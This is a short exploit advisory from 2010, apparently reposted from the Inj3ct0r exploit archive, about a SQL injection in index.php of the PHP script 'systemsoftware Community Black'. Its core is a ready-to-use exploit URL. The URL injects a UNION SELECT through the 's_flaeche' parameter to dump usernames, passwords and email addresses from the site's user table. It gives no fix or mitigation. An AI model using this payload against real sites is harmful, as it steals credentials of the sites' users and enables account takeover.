systemsoftware Community Black index.php SQL Injection Vulne
Posted on 13 March 2010
==================================================================== systemsoftware Community Black index.php SQL Injection Vulnerability ==================================================================== ----------------------------Information------------------------------------------------ +Name : systemsoftware Community Black index.php SQL Injection +Autor : Easy Laster +Date : 13.03.2010 +Script : systemsoftware Community Black +Download : ---------------- +Price : 129.00 euro +Language : PHP +Discovered by Easy Laster ---------------------------------------------------------------------------------------- +Vulnerability : http://www.site.com/community/index.php?d=list1&q=&kat=1&s_flaeche= +Exploitable : http://www.site.com/community/index.php?d=list1&q=&kat=1&s_flaeche= -9999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat(username ,0x3a,passwort,0x3a,email),21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 ,41,42,43+from+user+where+id=1-- ----------------------------------------------------------------------------------------- # ~ - [ [ : Inj3ct0r : ] ]
